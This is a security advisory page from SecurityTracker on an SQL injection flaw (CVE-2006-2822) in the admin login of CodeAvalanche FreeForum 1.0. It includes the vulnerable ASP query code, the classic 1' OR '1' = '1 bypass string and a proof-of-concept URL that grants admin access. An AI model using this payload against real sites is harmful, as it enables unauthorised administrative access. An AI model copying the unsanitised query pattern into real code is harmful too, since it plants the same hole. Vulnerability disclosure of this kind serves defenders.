SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   CodeAvalanche FreeForum Vendors:   CodeAvalanche
CodeAvalanche FreeForum Input Validation Hole Permits SQL Injection Attacks
SecurityTracker Alert ID:  1016212
SecurityTracker URL:  http://securitytracker.com/id/1016212
CVE Reference:   CVE-2006-2822   (Links to External Site)
Updated:  May 22 2009
Original Entry Date:  Jun 2 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:   A vulnerability was reported in CodeAvalanche FreeForum. A remote user can inject SQL commands.

The 'admin/default.asp' script does not properly validate user-supplied input in the 'password' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. This can be exploited to gain administrative access to the target application.

A demonstration exploit URL is provided:

http://[target]/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1

omnipresent discovered this vulnerability.

The original advisory is available at:

http://colander.altervista.org/advisory/CAForum.txt

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.truecontent.info/codeavalanche/asp-forum-script.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CA Forum Remote SQL Injection

------------------------------------------------------------------

               - CAForum 1.0 Remote SQL Injection -

   -= http://colander.altervista.org/advisory/CAForum.txt =-

------------------------------------------------------------------


	    -= CodeAvalanche Forum Version 1.0 =-




Omnipresent

june 01, 2006



Vunerability(s):

----------------

SQL Injection




Product:

--------

CodeAvalanche Forum Version 1.0


Vendor:

--------

http://www.truecontent.info/codeavalanche/asp-forum-script.php



Description of product:

-----------------------


CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your

visitors. Administrator can add unlimited number of forum categories.



Vulnerability / Exploit:

------------------------


In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.

A malicious people can gain Admin rights by putting rights parameters in the Password Variable.


Let's Check the source code:


<% Response.Buffer = True 



userLogged=false

If Request("Password")<>"" Then 

'response.Write(Request("Password")) 

'response.flush


dim rsUser,selectSQL

selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"



[...]




[End default.asp]


As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the

password field:



1' OR '1' = '1


So, the query will be:


selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'



And you can gain access to the application with admin rights.



PoC / Proof of Concept of SQL Injection:

----------------------------------------


This is a simple Proof Of Concept used on my local machine:



http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1



Vendor Status

-------------


Not informed!


Credits:

--------

omnipresent

omnipresent@email.it

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC